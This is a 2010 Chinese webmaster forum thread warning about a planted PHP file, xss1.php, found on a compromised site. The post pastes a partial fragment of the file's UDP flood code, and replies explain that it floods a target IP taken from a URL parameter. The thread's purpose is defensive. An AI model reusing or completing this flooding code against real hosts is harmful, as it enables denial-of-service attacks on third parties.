设为首页收藏本站

简体中文 繁體中文 English 日本語 Deutsch 한국 사람 بالعربية TÜRKÇE português คนไทย french

搜索
热搜: 活动 交友 discuz

发一个php 攻击代码.大家注意. [复制链接]
查看:302 | 回复:28

89

主题

937

回帖

2251

积分

金牌会员

积分
2251
发表于 2010-12-4 12:03:10 | 显示全部楼层 |阅读模式

今天收到服务商的警告.说有outgoing dos attack.并给了几个IP让我检查.
检查后发现一个用户的网站应该是被挂马,许多目录下存在这样一个文件: xss1.php,里面的内容如下:[ol]
  • $max_time){                break;        }               
  • $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);        
  • if($fp){                fwrite($fp, $out);               
  • fclose($fp);        }}
  • echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";?>[/ol]复制代码请勿用于非法用途

    [ 本帖最后由 诡谲 于 2010-12-4 12:19 编辑 ]
  • 405

    主题

    1万

    回帖

    2万

    积分

    论坛元老

    积分
    24541
    发表于 2010-12-4 12:25:28 | 显示全部楼层
    表示看不懂代码的我路过。

    177

    主题

    1336

    回帖

    3315

    积分

    论坛元老

    积分
    3315
    发表于 2010-12-4 12:26:40 | 显示全部楼层
    这个应该不是马吧!都是代码!没连接地址!

    126

    主题

    788

    回帖

    2034

    积分

    金牌会员

    积分
    2034
    发表于 2010-12-4 12:27:54 | 显示全部楼层
    用socket而已,可以禁用的。

    89

    主题

    9361

    回帖

    1万

    积分

    论坛元老

    积分
    19087
    发表于 2010-12-4 12:27:55 | 显示全部楼层
    难道这是dos??

    88

    主题

    365

    回帖

    1042

    积分

    金牌会员

    积分
    1042
    发表于 2010-12-4 12:28:43 | 显示全部楼层
    这个是被挂的马吧?
    相当于个小“僵尸”了,呵呵,接受黑客的URL输入参数IP向该IP的端口发UDP Flood攻击。。
    网站有上传功能的应该小心。

    [ 本帖最后由 liheyuan 于 2010-12-4 12:30 编辑 ]

    72

    主题

    281

    回帖

    834

    积分

    高级会员

    积分
    834
    发表于 2010-12-4 12:29:06 | 显示全部楼层
    这是端口扫描。

    36

    主题

    476

    回帖

    1088

    积分

    金牌会员

    积分
    1088
    发表于 2010-12-4 12:29:07 | 显示全部楼层
    呃,看错了,看到65535就自动默认了。。第一行:这个程序不限时,一直执行完毕
    第二行:这个程序不理会使用者是否关闭浏览器,都会在服务器端执行完毕
    后面是fsockopen提交。。。。

    去D别人的吧

    70

    主题

    1058

    回帖

    2378

    积分

    金牌会员

    积分
    2378
    发表于 2010-12-4 12:30:08 | 显示全部楼层
    还是隐藏吧。无聊的人太多了

    0

    主题

    1

    回帖

    4

    积分

    新手上路

    积分
    4
    发表于 2010-12-4 12:31:07 | 显示全部楼层
    学习中,

    您需要登录后才可以回帖 登录 | 立即注册

    论坛客服/商务合作/投诉举报:2171544 (QQ)
    落伍者创建于2001/03/14,本站内容均为会员发表,并不代表落伍立场!
    拒绝任何人以任何形式在本论坛发表与中华人民共和国法律相抵触的言论!
    落伍官方微信:2030286 邮箱:(djfsys@gmail.com|tech@im286.com)
    © 2001-2014

    浙公网安备 33060302000191号

    浙ICP备11034705号 BBS专项电子公告通信管[2010]226号

      落伍法律顾问: ITlaw-庄毅雄

    Archiver|手机版|Discuz! X

    GMT+8, 2026-6-29 07:27 , Processed in 0.015832 second(s), 3 queries , Gzip On, Redis On.

    返回顶部